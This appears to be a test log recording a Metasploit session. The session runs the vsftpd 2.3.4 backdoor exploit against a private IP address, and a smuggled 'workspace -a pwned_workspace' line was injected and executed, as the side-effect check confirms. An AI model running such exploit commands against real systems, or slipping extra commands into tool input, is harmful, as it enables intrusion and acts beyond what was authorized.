============================================================ CAPTURED CONSOLE COMMAND ============================================================ use exploit/unix/ftp/vsftpd_234_backdoor set RHOSTS 192.168.1.1 workspace -a pwned_workspace set RPORT 21 set DisablePayloadHandler True set TARGET 0 run -z ============================================================ COMMAND ANALYSIS (line by line) ============================================================ Line 1: 'use exploit/unix/ftp/vsftpd_234_backdoor' Line 2: 'set RHOSTS 192.168.1.1' Line 3: 'workspace -a pwned_workspace' Line 4: '' Line 5: 'set RPORT 21' Line 6: 'set DisablePayloadHandler True' Line 7: 'set TARGET 0' Line 8: 'run -z' ============================================================ SIDE EFFECT VERIFICATION ============================================================ Workspaces before: 0 Workspaces after: 1 Workspaces created: ['pwned_workspace'] Executed commands: - use exploit/unix/ftp/vsftpd_234_backdoor - set RHOSTS 192.168.1.1 - set RPORT 21 - set DisablePayloadHandler True - set TARGET 0 - run -z - use exploit/unix/ftp/vsftpd_234_backdoor - set RHOSTS 192.168.1.1 - workspace -a pwned_workspace - set RPORT 21 - set DisablePayloadHandler True - set TARGET 0 - run -z